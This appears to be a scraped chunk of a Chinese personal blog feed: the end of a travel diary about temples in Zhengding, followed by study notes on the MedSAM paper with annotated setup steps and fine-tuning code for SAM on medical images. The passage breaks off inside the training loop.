    天宁寺,旧名大藏院,北宋大中祥符年间(1008-1016)建,赐名“承天寺”。政和年间(1111-1118)始称天宁寺。宋高宗绍兴八年(公元 1138 年)为祀奉父王徽宗,赐名“报恩广寺”,后又改“报恩光寺”。现仅存天宁寺大殿。1988 年国务院公布为全国重点文物保护单位。天宁寺大殿是我国南方现存典型的元代木构建筑之一,面阔进深各为三间,单檐歇山顶。大殿当心间东首三桷柃下有“大元延祐五年岁在戊午六月庚申吉旦重建恭祝”的双钩墨题记。

    天宁寺。全票¥15.00,今日特惠¥7.50。这里还是人大历史学院实践基地🤔。天宁寺主体建筑是凌霄塔。塔前介绍说绕七圈世界大同,我就绕了一圈意思了下。凡哥真的绕完了七圈!我说不祈求啥世界大同,俄乌停火就行,凡哥直接说世界大同就是美国爆炸🤪。

    15:40-二五六医院

    jpg

    有特色的医院

    ​ 又看中了一个塔,结果看地图发现是二五六医院😅,还闻到一股消毒水的味道,这里连医院都修得这么古色古香的吗!

    15:50-旺泉南街

    jpg

    网红小街

    ​ 在去逛最大的隆兴寺之前,我们决定先吃点东西。来到了旺泉南街,这里感觉更有南后街的味道了。想去吃一碗正宗安徽牛肉 ber 面,结果发现没有,擦。八大碗一看就不是两个人能吃得下的,放弃。然后都是卖一些网红食品,烤串、臭豆腐、冰激凌之类的🤔。

    16:13-烧卖

    jpg

    好吃的肉烧卖

    ​ 最后还是去隆兴寺对面的小吃店整了一屉烧卖。10 个烧卖¥20.00。感觉里面是牛肉?我觉得很香,凡哥说肉有点腥他受不了🤔。

    16:21-隆兴寺

    png

    最大的隆兴寺

    ​ 然后就是正定古城里的老大哥——隆兴寺!规模确实蛮大的。这个票对一般人不半价,¥50.00,但是我们有学生证,耶!¥25.00。

    隆兴寺,别名大佛寺,位于河北省石家庄市正定县城东门里街,寺院始建于隋开皇六年(586 年),初名龙藏寺,唐改额龙兴寺,康熙四十九年(1710 年)赐额“隆兴寺”并沿用至今;是中国国内保存时代较早、规模较大而又保存完整的佛教寺院之一。
    寺院占地面积 82500 平方米,大小殿宇十余座,分布在南北中轴线及其两侧,高低错落,主次分明,是研究宋代佛教寺院建筑布局的重要实例。
    隆兴寺核定为中国 AAAA 级旅游景区、全国首批重点文物保护单位、中国十大名寺之一。

    • 据出租车司机介绍,有一个高 22 米的千手观音,走近看非常气派
    • 还有一些佛教壁画
    • 一些楼有那么一点像北京故宫
    • 有一个假山有点像北京景山,站在山上看风景,可惜不够高🤔
    • 一些佛教雕塑,我以为是经过风吹日晒都断了头,旁边人说是文革的时候被打烂了。北方当时闹文革还是凶猛啊🫣,直接把保定的省会揍没了

    17:34-赵云庙

    png

    吾乃石家庄赵子龙也!

    赵云庙位于河北省石家庄市正定县,1997 年正式对外开放。赵云字子龙,常山真定(今石家庄市古城东路一带)人,三国名将,有“常胜将军”之称。

    ​ 很多人都嘲笑石家庄这个名字太土,叫石门或者常山会好听很多。“吾乃石家庄赵子龙”,笑死。赵云庙今日特惠半票¥10.00。里面有很多雕塑,不过都是现代的,五虎上将啊,刘关张赵,刘关张赵诸葛啥的。有一丛修成小人拿着十八般兵器的园林,还有射箭项目,¥10.00 可以射 20 支,没射😅,居然还有当年长坂坡战场的黄土,靠不靠谱啊这个。

    18:02-荣国府

    png

    不知所云的荣国府

    ​ 之前出租车司机说荣国府就是个新建的建筑,如果不懂《红楼梦》别去,果然是这样😅。可是没办法,既然来都来了,强迫症驱使下还是进去了。¥40.00 不特惠但是学生证半票¥20.00。里面有很多红楼梦元素,林黛玉贾宝玉 balabala……可惜我这个粗人没看过《红楼梦》😅。有很多穿汉服的女孩子在里面拍照。

    荣国府是根据中国古典名著《红楼梦》严格设计和建造的,是一座具有明清风格的仿古建筑群,分府、街两大部分。荣国府是按照《红楼梦》中所描绘的“金门玉户神仙府,桂殿兰宫妃子家”建造的一座封建王宫,占地面积二万二千平方米。

    18:36-ber 面

    jpg

    没吃上 ber 面,血亏

    ​ 出来有一家 ber 面,¥10.00 一碗可惜没卖了,只有饸(hé)饹(le)面,没吃。

    18:55-正定北城墙

    jpg

    城墙原来的面貌

    ​ 又一阵走走到正定北城墙。这才是没修缮前城墙的原来样貌啊😅!

    19:00-正定一中

    jpg

    河北正定一中

    ​ 要赶 19:50 的火车,19:00 就打车润了,车费¥16.51。沿途看到的正定一中

    19:18-正定站

    jpg

    回!

    ​ 又回到了简朴的正定站

    jpg

    麻雀虽小,能用就行

    ​ 未免有点太简朴了喂!非常小的候车厅,然后连厕所还要到外面上,闸机也不用扫身份证🤔。

    19:47-润!

    jpg

    夜幕降临,你的故事结束了

    ​ 结果列车还晚点了 20 分钟,寄!

    21:32-保定站

    jpg

    晚上的保定站

    保定站,这个点叫车都不是很快,澡堂 22:00 关门啊喂!

    21:54-河百带学

    jpg

    最后一阵狂奔还是洗不上澡堂

    ​ 最后结果就是因为列车晚点 20 分钟导致 22:02 来到宿舍,就差一点,擦。然后我就又又又在阳台 DIY 了🤐。

    ]]>
    @@ -7024,7 +7024,7 @@ /posts/Diary-%E5%A5%BD%E5%A5%BD%E5%AD%A6%E4%B9%A0%E5%A5%BD%E5%A5%BD%E7%8E%A9%E7%9A%84%E7%AC%AC%209%20%E5%91%A8%E5%92%8C%E7%AC%AC%2010%20%E5%91%A8/ -
    ]]>
    +
    ]]>
    @@ -7078,7 +7078,7 @@ /posts/Paper-Segment%20Anything%20in%20Medical%20Images/ - 资源

    笔记

    • SAM 真是太牛逼啦!但是它在医学图像上的性能十分有限。

    • 介绍了 MedSAM

      • 设计了一个大规模的医学图像数据集,包含 11 种模式,20 多万个蒙版。提供了关于在定制的新数据集上微调 SAM 的分步教程

      • 开发了一种简单的微调方法(simple fine-tuning method),将 SAM 用于普通医学图像分割。在 21 个 3D 分割任务和 9 个 2D 任务中,比默认 SAM 要好使。


    ​ 第一个也是最著名的**基础分割模型(segmentation foundation model)**是 SAM,它在超过 1B 个蒙版上进行训练,可以根据提示(例如,边界框、点、文本)或以全自动的方式生成准确的对象蒙版。但是自然图像和医学图像之前存在显著差异,这些模型在医学图像分割中的适用性仍然有限,在一些典型的医学图像分割任务(对象边缘信息较弱)中不好使。


    ​ SAM 利用了基于 transformer 的架构:

    • 使用 transformer-based 的**图像编码器(image encoder)**提取图像特征

      • pretrained with masked auto-encoder modeling,可以处理高分辨率图像(即 $1024\times 1024$),获得的图像嵌入是 $16\times \mathrm{downscaled}(64\times 64)$
    • 使用**提示编码器(prompt encoder)**结合用户交互

      • 支持四种不同的提示
        • 点:通过傅里叶位置编码和两个可学习的标记进行编码,分别用于指定前景和背景
        • 边界框:通过其左上角的点和右下角的点进行编码
        • 文本:由 CLIP 中经过预训练的文本编码器进行编码
        • 掩码:与输入图像具有相同的分辨率,输入图像由卷积特征图编码
    • 使用**掩码解码器(mask encoder)**来基于图像嵌入、提示嵌入和输出令牌生成分割结果和置信度得分。

      • 采用了轻量级设计,由两个转换器层组成,具有动态蒙版预测头和两个交集(Intersection-over-Union,IOU)分数回归头。

    ​ 蒙版预测头可以生成 3 个 $4\times \mathrm{downscaled\ masks}$,分别对应于整个对象、部分对象和子对象。

    png


    SAM 支持 3 中主要的分割模式:

    • 以全自动方式分割所有内容(segment everything in a fully automatic way)
      • 没有语义标签,一些分割的东西无意义
    • 边界框模式(bounding box mode)
      • 只给出左上角和右下角的点,就可以为右肾提供良好的分割结果
    • 点模式(point mode)
      • 先给一个前景点,再给一个背景点

    我们认为,在医学图像分割任务中使用 SAM 时,基于边界框的分割模式比基于分割一切和点的分割模式具有更广泛的实用价值。


    ​ 为了使 SAM 适用于医学图像分割,有必要选择适当的用户提示和网络组件进行微调。

    ​ 基于以上分析,边界框提示是指定分割目标的正确选择。SAM 的网络架构包含三个主要组件:图像编码器提示编码器掩码解码器。人们可以选择微调它们的任何组合。

    • 图像编码器基于 vision transformer,该转换器在 SAM 中具有最大的计算开销。为了降低计算成本,将图像编码器 冻结

    • 提示编码器对边界框的位置信息进行编码,并且可以从 SAM 中预先训练的边界框编码器中重复使用,冻结

    • 微调 掩码解码器

    png

    ​ 由于图像编码器可以在提示模型之前应用,因此我们可以预先计算所有训练图像的图像嵌入,以避免每次提示的图像嵌入的重复计算,这可以显著提高训练效率。掩码解码器只需要生成一个掩码,而不需要生成三个掩码,因为在大多数情况下,边界框提示可以清楚地指定预期的分割目标。


    ​ 每个数据集被随机分为80个和20个,用于训练和测试。排除了像素小于 100 的分割目标。由于 SAM 是为 2D 图像分割而设计的,我们将3D图像(即CT、MR、PET)沿平面外维度划分为2D切片。然后,我们使用预先训练的 ViT-Base 模型作为图像编码器,并通过将归一化的图像馈送到图像编码器来离线计算所有图像嵌入(图像编码器将图像大小转换为 $3\times 1024\times 1024$)。在训练期间,边界框提示是从具有0-20个像素的随机扰动的地面实况掩码生成的。损失函数是Dice损失和交叉熵损失之间的未加权和,已被证明在各种分割任务中是稳健的。Adam 优化器对网络进行了优化,初始学习率为1e-5。


    ​ 使用骰子相似系数(DSC)归一化表面距离(NSD,公差 1mm)来评估基本事实和分割结果之间的区域重叠率和边界一致性,这是两种常用的分割指标


    ​ 我们的代码和经过训练的模型是公开的,我们提供了关于在定制的新数据集上微调SAM的分步教程。我们期待着与社区合作,共同推进这一令人兴奋的研究领域。

    代码

    配置

    新建一个 conda 环境:

    conda create -n medsam python=3.10 -y

    激活之:

    conda activate medsam

    离线安装 pytorch:

    download.pytorch.org/whl/torch_stable.html 下载对应版本的 pytorchtorchvision

    • torch-2.0.0+cu117-cp310-cp310-win_amd64.whl
    • torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl

    png

    安装之:

    pip install torch-2.0.0+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple
    pip install torchvision-0.15.1+cu117-cp310-cp310-win_amd64.whl -i https://pypi.tuna.tsinghua.edu.cn/simple

    下载仓库:bowang-lab/MedSAM:MedSAM:Segment Anything in Medical Images的官方存储库。 (github.com)

    在仓库文件夹下:

    pip install -e . -i https://pypi.tuna.tsinghua.edu.cn/simple

    在自定义数据集上微调 SAM

    1. 打开 pre_CT.py ,查看里面 parser 都定义了什么玩意儿:
    # set up the parser
    parser = argparse.ArgumentParser(description='preprocess CT images')
    parser.add_argument('-i', '--nii_path', type=str, default='data/FLARE22Train/images', help='path to the nii images')
    parser.add_argument('-gt', '--gt_path', type=str, default='data/FLARE22Train/labels', help='path to the ground truth',)
    parser.add_argument('-o', '--npz_path', type=str, default='data/Npz_files', help='path to save the npz files')

    parser.add_argument('--image_size', type=int, default=256, help='image size')
    parser.add_argument('--modality', type=str, default='CT', help='modality')
    parser.add_argument('--anatomy', type=str, default='Abd-Gallbladder', help='anatomy')
    parser.add_argument('--img_name_suffix', type=str, default='_0000.nii.gz', help='image name suffix')
    parser.add_argument('--label_id', type=int, default=9, help='label id')
    parser.add_argument('--prefix', type=str, default='CT_Abd-Gallbladder_', help='prefix')
    parser.add_argument('--model_type', type=str, default='vit_b', help='model type')
    parser.add_argument('--checkpoint', type=str, default='work_dir/SAM/sam_vit_b_01ec64.pth', help='checkpoint')
    parser.add_argument('--device', type=str, default='cuda:0', help='device')
    # seed
    parser.add_argument('--seed', type=int, default=2023, help='random seed')
    args = parser.parse_args()
    参数名简称类型默认值备注
    –nii_path-istr‘data/FLARE22Train/images’path to the nii images
    –gt_path-gtstr‘data/FLARE22Train/labels’path to the ground truth
    –npz_path-ostr‘data/Npz_files’path to save the npz files
    –image_sizeint256image size
    –modalitystr‘CT’modality 形态
    –anatomystr‘Abd-Gallbladder’anatomy 解剖
    –img_name_suffixstr‘_0000.nii.gz’image name suffix 图像名称后缀
    –label_idint9label id
    –prefixstr‘CT_Abd-Gallbladder_’prefix 前缀
    –model_typestr‘vit_b’model type 模型类别
    –checkpointstr‘work_dir/SAM/sam_vit_b_01ec64.pth’checkpoint
    –devicestr‘cuda:0’device
    –seedint2023random seed 随机数种子
    1. 下载 sam_vit_b_01ec64.pth 并将其放置在 work_dir/SAM/ 中:

    png

    3D

    1. 下载 FLARE22Train.zip 并将其解压,放置在 data/ 中:

    png

    该数据集包含 50 个腹部 CT 扫描,每个扫描包含一个包含 13 个器官的注释面罩。器官标签的名称可在 MICCAI FLARE2022 上找到。 在本教程中,我们将微调 SAM 以进行胆囊 (gallbladder) 分割。

    nii.gz 是一种常见的医学影像数据格式。它是基于 NIfTI(Neuroimaging Informatics Technology Initiative)格式的一种压缩文件,通常用于存储头颅和身体的 MRI 和 CT 数据。该格式包含图像的三维体积数据,以及与图像相关的元数据信息,如图像分辨率、采集参数等。nii.gz 文件可以通过各种软件进行读取、编辑和处理,如 FSL、SPM、ANTs 等。

    1. 开跑 pre_CT.py 这只是个预处理!

      • 拆分数据集:80% 用于训练,20% 用于测试

      • 图像归一化

      • 预计算图像嵌入

      • 将归一化图像 imgs.npy、真实情况掩码 gts.npy 和图像 img_embeddings.npy 嵌入另存为文件 npz

    npy 文件是 numpy 保存单个数组的一种二进制文件格式,它可以包含一个 numpy 数组,这个数组的维度和类型等信息都可以被存储在这个文件中。npy 文件通过使用 numpy 库中的 load() 和 save() 函数进行读写。

    相比于 txt、csv 这样的文本型数据文件,npy 文件具有更好的性能和可靠性。因为文本型数据需要进行字符串转化和解析等操作,在面对大量数据时会出现读写速度较慢的情况,并且数据解析容易受到不同系统和软件的影响而出现错误。而 npy 文件采用二进制存储,可以直接将内存中的二进制数组写入文件,不需要转化和解析字符串,性能更高,同时因为没有转化字符类型,也不存在因不同系统和软件的影响而出现的数据解析错误。

    npz 是 numpy 保存数组的一种格式,它是一种压缩文件格式,可以将多个 numpy 数组打包存放在一个文件中,其压缩率较高。使用 np.savez_compressed() 函数可以生成 .npz 文件,使用 np.load() 函数可以读取 .npz 文件中的数组。相比其他文件格式(如 .txt、.csv 等),.npz 文件可以更方便地用于存储和加载大型数组数据集,因为它可以使用 numpy 库提供的高效的加载和存储方法。此外,.npz 文件还可以轻松地传递和共享数组数据集,并且不像其他文件格式那样需要手动编写 IO 操作代码来读取和写入数据。

    png

    1. 然后就可以跑 finetune_and_inference_tutorial_3D_dataset.ipynb

    2D

    1. MedSAMDemo_2D.zip - Google Drive 下载 2D 数据集,放置在 data/ 中:

    png

    png

    png

    1. 开跑 pre_grey_rgb2D.py 这只是个预处理!好在这部分用时不是很长,就拿笔记本直接跑了。

    png

    1. 获得 data\demo2D_vit_b\demo2d.npz!然后就可以跑 finetune_and_inference_tutorial_2D_dataset.ipynb

    png

    又遇俩坑,填填填:

    pip install chardet
    pip install --force-reinstall charset-normalizer==3.1.0

    可以跑了!

    png

    看代码

    pre_grey_rgb2D.py

    这个代码主要是对数据集进行预处理。

    set up the parser

    nametypedefaulthelp
    -i, --img_pathstrdata/MedSAMDemo_2D/train/imagespath to the images
    -gt, --gt_pathstrdata/MedSAMDemo_2D/train/labelspath to the ground truth (gt)
    -o, --npz_pathstrdata/demo2Dpath to save the npz files
    –data_namestrdemo2ddataset name; used to name the final npz file, e.g., demo2d.npz
    –image_sizeint256image size
    –img_name_suffixstr.pngimage name suffix
    –label_idint255label id
    –model_typestrvit_bmodel type
    –checkpointstrwork_dir/SAM/sam_vit_b_01ec64.pthcheckpoint
    –devicestrcuda:0device
    –seedint2023random seed
    # 获取 args.gt_path 目录下所有文件名,并按字典序排序,将结果赋值给 names
    names = sorted(os.listdir(args.gt_path))
    # 将 args.npz_path 和 args.model_type 拼接成一个新路径名 save_path
    save_path = args.npz_path + '_' + args.model_type
    # 创建新的目录save_path。如果该目录已经存在,则不做任何操作。如果不存在,则新建该目录及其所有上级目录
    os.makedirs(save_path, exist_ok=True)
    # 打印输出 names 列表的长度即图片数量
    print('image number:', len(names))

    set up the model

    # 初始化模型,设置好 args.model_type、args.checkpoint、args.device
    sam_model = sam_model_registry[args.model_type](checkpoint=args.checkpoint).to(args.device)

    convert 2d grey or rgb images to npz file

    imgs = []  # 图片(images)
    gts = [] # 标签(labels)
    img_embeddings = [] # 图片嵌入信息

    # 遍历 ground truth 文件夹, names 默认为 args.gt_path('data/MedSAMDemo_2D/train/labels')下排序好的文件列表
    for gt_name in tqdm(names):
    image_name = gt_name.split('.')[0] + args.img_name_suffix # 获得文件名称 + 后缀名
    gt_data = io.imread(join(args.gt_path, gt_name)) # 获得 ground truth 数据
    if len(gt_data.shape)==3: # 如果 gt_data 是三维的,则只取第一个通道(灰度图)
    gt_data = gt_data[:,:,0]
    assert len(gt_data.shape)==2, 'ground truth should be 2D' # 确保分割标签是二维的(高和宽)
    # 这行代码的作用是将分割标签(即 gt_data)缩放到指定大小(args.image_size),并将其值转换为二进制形式(0 和 1)。
    # 具体来说,它会将分割标签中所有等于 args.label_id 的像素点设置为 1,其余像素点设置为 0,然后将结果缩放到指定大小。
    # 这里使用了 scikit-image 库的 transform.resize 函数,
    # 并指定了 order=0 表示使用最近邻插值法,
    # preserve_range=True 表示保持输入图像的范围不变(即值仍在 0 到 1 之间),
    # mode='constant' 表示在缩放后填充常数值的方式为使用边界值填充。
    # 最终得到的结果是一个二值图像,即只包含 0 和 1 两种像素值的图像。
    gt_data = transform.resize(gt_data==args.label_id, (args.image_size, args.image_size), order=0, preserve_range=True, mode='constant')
    # 将gt_data值转换为 8 位无符号整数
    gt_data = np.uint8(gt_data)

    # exclude tiny objects 如果分割标签中包含的像素点数大于 100,则执行以下操作(对源图像进行预处理,加入最终的数据集中)
    if np.sum(gt_data)>100:
    # 最大值是 1,就两种像素点。确保分割标签是二值图
    assert np.max(gt_data)==1 and np.unique(gt_data).shape[0]==2, 'ground truth should be binary'
    # 获得图像数据
    image_data = io.imread(join(args.img_path, image_name))
    # 如果图像包含透明度通道,则只取前三个通道,即 RGB 通道
    if image_data.shape[-1]>3 and len(image_data.shape)==3:
    image_data = image_data[:,:,:3]
    # 如果图像只有一个通道,则将其复制三次,即得到一个 RGB 图像
    if len(image_data.shape)==2:
    image_data = np.repeat(image_data[:,:,None], 3, axis=-1)
    # nii preprocess start
    # 计算图像的亮度范围,即确定合适的像素值下限和上限
    # 使用 np.percentile 函数分别计算了图像中像素值从小到大排列后第 0.5% 和第 99.5% 的值,
    # 将其作为下限和上限,用于后续的像素值标准化处理
    lower_bound, upper_bound = np.percentile(image_data, 0.5), np.percentile(image_data, 99.5)
    # 将图像中的像素值限制在 lower_bound 和 upper_bound 之间
    image_data_pre = np.clip(image_data, lower_bound, upper_bound)
    # 将调整后的图像进行标准化,方法是先将图像中所有像素值减去最小值,然后除以像素值范围(即最大值减去最小值),最后乘以255,使像素值缩放到0-255的范围。
    # 这样做的目的是为了使得图像不受亮度范围的影响,并且方便后续模型的处理,因为很多模型输入都需要归一化的图像数据
    image_data_pre = (image_data_pre - np.min(image_data_pre))/(np.max(image_data_pre)-np.min(image_data_pre))*255.0
    # 将背景像素(黑色)设置为 0
    image_data_pre[image_data==0] = 0
    # 调整图像大小,并使用三次样条插值方法进行重采样,使得图像更加平滑,并保持图像的范围不变
    image_data_pre = transform.resize(image_data_pre, (args.image_size, args.image_size), order=3, preserve_range=True, mode='constant', anti_aliasing=True)
    # 将图像像素值转换为 8 位无符号整数
    image_data_pre = np.uint8(image_data_pre)

    # 将处理后的图像添加到 imgs 列表中
    imgs.append(image_data_pre)
    # 确保分割标签中包含的像素点数大于100(这里为啥又问一遍?闻到了屎山的味道)
    assert np.sum(gt_data)>100, 'ground truth should have more than 100 pixels'
    # 将处理后的分割标签添加到gts列表中
    gts.append(gt_data)
    # resize image to 3*1024*1024
    # 创建一个 ResizeLongestSide 对象
    # ResizeLongestSide 的类,用于将图像和坐标进行长边缩放。
    # 具体来说,该类实现了 apply_image 和 apply_coords 两个方法,分别用于处理图像和坐标
    sam_transform = ResizeLongestSide(sam_model.image_encoder.img_size)
    # 将该 ResizeLongestSide 对象应用于 image_data_pre 图像,重新调整大小并返回新的图像 resize_img
    resize_img = sam_transform.apply_image(image_data_pre)
    # 将 numpy 数组 resize_img 转换为 PyTorch 张量,同时将其移动到 GPU
    resize_img_tensor = torch.as_tensor(resize_img.transpose(2, 0, 1)).to(args.device)
    # 对图像进行预处理,例如减去均值、除以标准差等
    input_image = sam_model.preprocess(resize_img_tensor[None,:,:,:]) # (1, 3, 1024, 1024)
    assert input_image.shape == (1, 3, sam_model.image_encoder.img_size, sam_model.image_encoder.img_size), 'input image should be resized to 1024*1024'
    # pre-compute the image embedding
    # 对输入图像进行特征提取,得到图片的 embedding
    with torch.no_grad():
    embedding = sam_model.image_encoder(input_image)
    img_embeddings.append(embedding.cpu().numpy()[0])

    save all 2D images as one npz file: ori_imgs, ori_gts, img_embeddings

    stack the list to array

    # 将所有2D图像以及它们的相关信息(如 ground truth 和 image embedding)保存成一个 npz 文件
    if len(imgs)>1:
    imgs = np.stack(imgs, axis=0) # (n, 256, 256, 3) 表示 n 张 256x256 的 RGB 图像
    gts = np.stack(gts, axis=0) # (n, 256, 256) 表示 n 张 256x256 的灰度图像
    img_embeddings = np.stack(img_embeddings, axis=0) # (n, 1, 256, 64, 64) 将每张图像转换为了1个256x64x64的图像embedding
    # 使用np.savez_compressed函数将这三个numpy数组保存成一个npz文件,其中imgs、gts和img_embeddings分别对应三个关键字参数
    np.savez_compressed(join(save_path, args.data_name + '.npz'), imgs=imgs, gts=gts, img_embeddings=img_embeddings)
    # save an example image for sanity check 随机选择一个图像进行可视化检查
    idx = np.random.randint(imgs.shape[0]) # 随机生成一个索引 idx
    # 从 imgs、gts 和 img_embeddings 中提取出该索引对应的图像
    # img_idx、ground truth gt_idx 和 image embedding img_emb_idx
    img_idx = imgs[idx,:,:,:]
    gt_idx = gts[idx,:,:]
    # 代码使用scikit-image库的find_boundaries函数找到gt_idx中每个目标的边缘位置,并将img_idx中边缘位置的像素设为红色
    bd = segmentation.find_boundaries(gt_idx, mode='inner')
    # 将边缘设为红色
    img_idx[bd, :] = [255, 0, 0]
    # 使用io.imsave函数将处理后的img_idx保存成png文件,以便进一步进行可视化检查
    io.imsave(save_path + '.png', img_idx, check_contrast=False)

    finetune_and_inference_tutorial_2D_dataset.ipynb

    在获得预处理好的数据集后,就可以运行 finetune_and_inference_tutorial_2D_dataset.ipynb 对 SAM 模型进行 fine-tune。

    class NpzDataset(Dataset)

    class NpzDataset(Dataset): 
    def __init__(self, data_root):
    # 读取指定目录下的所有 .npz 文件
    self.data_root = data_root
    self.npz_files = sorted(os.listdir(self.data_root))
    self.npz_data = [np.load(join(data_root, f)) for f in self.npz_files]
    # this implementation is ugly but it works (and is also fast for feeding data to GPU) if your server has enough RAM as an alternative, you can also use a list of npy files and load them one by one
    # 这个实现是丑陋的,但它可以工作(并且向 GPU 提供数据的速度也很快)如果你的服务器有足够的 RAM 作为替代方案,你也可以使用 npy 文件列表并一个一个地加载它们
    # 使用了 np.vstack() 函数对这些数组进行垂直方向上的堆叠操作
    # 将它们的 gts 和 img_embeddings 字段整合成两个 numpy 数组: ori_gts 和 img_embeddings
    self.ori_gts = np.vstack([d['gts'] for d in self.npz_data])
    self.img_embeddings = np.vstack([d['img_embeddings'] for d in self.npz_data])
    # 包含了一条有用的调试信息输出语句,输出实际读取数据文件中的 img_embeddings 和 ori_gts 的形状
    print(f"{self.img_embeddings.shape=}, {self.ori_gts.shape=}")

    def __len__(self):
    """
    这段代码定义了 __len__ 方法,该方法返回数据集的大小(即所有样本的个数),在该代码中返回的是 ori_gts 数组的第一维大小。
    由于在 NpzDataset 类初始化时,已经将所有 npz 文件中的 gts 字段整合成一个 numpy 数组 ori_gts,因此该方法返回的是所有读取文件中的目标个数(即数据集中的样本数)
    """
    return self.ori_gts.shape[0]

    def __getitem__(self, index):
    # 词嵌入向量
    img_embed = self.img_embeddings[index]
    # Ground Truth
    gt2D = self.ori_gts[index]
    # 边界框
    y_indices, x_indices = np.where(gt2D > 0)
    x_min, x_max = np.min(x_indices), np.max(x_indices)
    y_min, y_max = np.min(y_indices), np.max(y_indices)
    # add perturbation to bounding box coordinates
    # 向边界框坐标添加扰动,以实现数据增强
    H, W = gt2D.shape
    x_min = max(0, x_min - np.random.randint(0, 20))
    x_max = min(W, x_max + np.random.randint(0, 20))
    y_min = max(0, y_min - np.random.randint(0, 20))
    y_max = min(H, y_max + np.random.randint(0, 20))
    bboxes = np.array([x_min, y_min, x_max, y_max])
    # convert img embedding, mask, bounding box to torch tensor
    # 返回一个三元组:(一个图像的嵌入向量 img_embed, 对应标注的二维 Ground Truth 图 gt2D, 对应的包含目标的边界框的四个坐标 bboxes)
    return torch.tensor(img_embed).float(), torch.tensor(gt2D[None, :,:]).long(), torch.tensor(bboxes).float()

    test dataset class and dataloader

    npz_tr_path = 'data/demo2D_vit_b'
    # 使用路径 npz_tr_path 创建了一个新的 NpzDataset 实例 demo_dataset
    demo_dataset = NpzDataset(npz_tr_path)
    # 训练开始前,代码使用 for 循环从 demo_dataloader 中依次读取一个小批量(batch)的数据,用于测试数据集和数据加载器的正确性。批大小为 8,这意味着每次迭代中将读取 8 个数据样本
    demo_dataloader = DataLoader(demo_dataset, batch_size=8, shuffle=True)
    for img_embed, gt2D, bboxes in demo_dataloader:
    # img_embed: (B, 256, 64, 64), gt2D: (B, 1, 256, 256), bboxes: (B, 4)
    # 使用 print() 函数打印了从 demo_dataloader 中读取的第一个小批量 img_embed、gt2D 和 bboxes 的形状,以确认它们是否与预期一致
    print(f"{img_embed.shape=}, {gt2D.shape=}, {bboxes.shape=}")
    # 这里程序使用 break 结束了遍历,只输出了第一个小批量的结果
    break

    set up model for fine-tuning

    # train data path
    npz_tr_path = 'data/demo2D_vit_b' # 训练数据
    work_dir = './work_dir' # 工作目录路径
    task_name = 'demo2D' # 任务名称
    # prepare SAM model
    model_type = 'vit_b' # 模型类型
    checkpoint = 'work_dir/SAM/sam_vit_b_01ec64.pth' # 预训练模型
    device = 'cuda:0' # 设备
    model_save_path = join(work_dir, task_name) # 模型保存地址
    os.makedirs(model_save_path, exist_ok=True)
    sam_model = sam_model_registry[model_type](checkpoint=checkpoint).to(device) # 加载模型
    sam_model.train() # 设为训练模式
    # Set up the optimizer, hyperparameter tuning will improve performance here
    optimizer = torch.optim.Adam(sam_model.mask_decoder.parameters(), lr=1e-5, weight_decay=0) # 优化器
    # 代码定义了一个分割损失函数,其中采用 DiceLoss 和 CrossEntropyLoss 的结合体。
    # DiceLoss 是一个测量预测分割与真实分割偏差的指标,CrossEntropyLoss 则是针对多分类问题的损失函数,用于评估预测结果的匹配程度
    seg_loss = monai.losses.DiceCELoss(sigmoid=True, squared_pred=True, reduction='mean') # 损失函数
    self.img_embeddings.shape=(456, 256, 64, 64), self.ori_gts.shape=(456, 256, 256)
    img_embed.shape=torch.Size([8, 256, 64, 64]), gt2D.shape=torch.Size([8, 1, 256, 256]), bboxes.shape=torch.Size([8, 4])

    training

    原作者用的是 NVIDIA RTX A5500,配有 24 GB 显存,而我的 RTX 4060 只有 8GB 显存,emmm 只能把 batch_size 调小。我调成了 8。训练过程中显存使用量一直维持在 2GB,感觉可以再调大些?

    num_epochs = 100  # 迭代次数
    losses = [] # 空列表,用于存放每个 epoch 的损失值
    best_loss = 1e10 # 最优损失值
    train_dataset = NpzDataset(npz_tr_path) # 读入训练数据
    # 定义数据加载器以便读取和组合数据,同时将样本分成大小为 64 的批次,并打乱顺序
    train_dataloader = DataLoader(train_dataset, batch_size=64, shuffle=True)
    for epoch in range(num_epochs):
    epoch_loss = 0
    # train
    # step 表示当前处理到了第几个批次
    # image_embedding 是嵌入图像的特征向量
    # gt2D 是训练数据的真实遮罩层标签
    # boxes 是真实的 2D 边界框
    for step, (image_embedding, gt2D, boxes) in enumerate(tqdm(train_dataloader)):
    # do not compute gradients for image encoder and prompt encoder
    # 冻结 图像编码器 和 提示编码器
    with torch.no_grad():
    # convert box to 1024x1024 grid
    # 将边界框坐标从原始坐标系转换为 1024x1024 网格坐标系
    box_np = boxes.numpy()
    # 改变大小
    sam_trans = ResizeLongestSide(sam_model.image_encoder.img_size)
    # 改变提示框大小
    box = sam_trans.apply_boxes(box_np, (gt2D.shape[-2], gt2D.shape[-1]))
    # 转换成 pytorch 张量
    box_torch = torch.as_tensor(box, dtype=torch.float, device=device)
    if len(box_torch.shape) == 2:
    """
    这段代码实现的是获取提示嵌入的过程。
    首先通过 if 语句来判断 box_torch 张量的形状是否为 (B, 4),
    其中 B 表示批次大小,4 表示边界框的坐标信息(左上角点和右下角点)。
    如果 box_torch 张量的形状是 (B, 4),则执行 if 语句中的代码进行扩维处理,
    将其转换为形状为 (B, 1, 4) 的张量。
    这么做是为了在后面的计算中保证输入张量的形状一致,从而避免出现维度不匹配的错误
    """
    box_torch = box_torch[:, None, :] # (B, 1, 4)
    # get prompt embeddings 获取提示嵌入
    sparse_embeddings, dense_embeddings = sam_model.prompt_encoder(
    points=None, # 没有用到点的信息
    boxes=box_torch, # 使用边界框来提取特征
    masks=None, # 没有使用遮罩层来进行像素级的聚合
    )
    # predicted masks 前向传播
    mask_predictions, _ = sam_model.mask_decoder(
    image_embeddings=image_embedding.to(device), # (B, 256, 64, 64)
    image_pe=sam_model.prompt_encoder.get_dense_pe(), # (1, 256, 64, 64)
    sparse_prompt_embeddings=sparse_embeddings, # (B, 2, 256)
    dense_prompt_embeddings=dense_embeddings, # (B, 256, 64, 64)
    multimask_output=False,
    )

    # 计算损失函数的值
    loss = seg_loss(mask_predictions, gt2D.to(device))
    # 反向传播
    optimizer.zero_grad()
    loss.backward()
    optimizer.step()
    # 记录损失值
    epoch_loss += loss.item()

    epoch_loss /= step
    losses.append(epoch_loss)
    print(f'EPOCH: {epoch}, Loss: {epoch_loss}')
    # save the latest model checkpoint
    torch.save(sam_model.state_dict(), join(model_save_path, 'sam_model_latest.pth')) # 最近一次 checkpoint
    # save the best model
    if epoch_loss < best_loss:
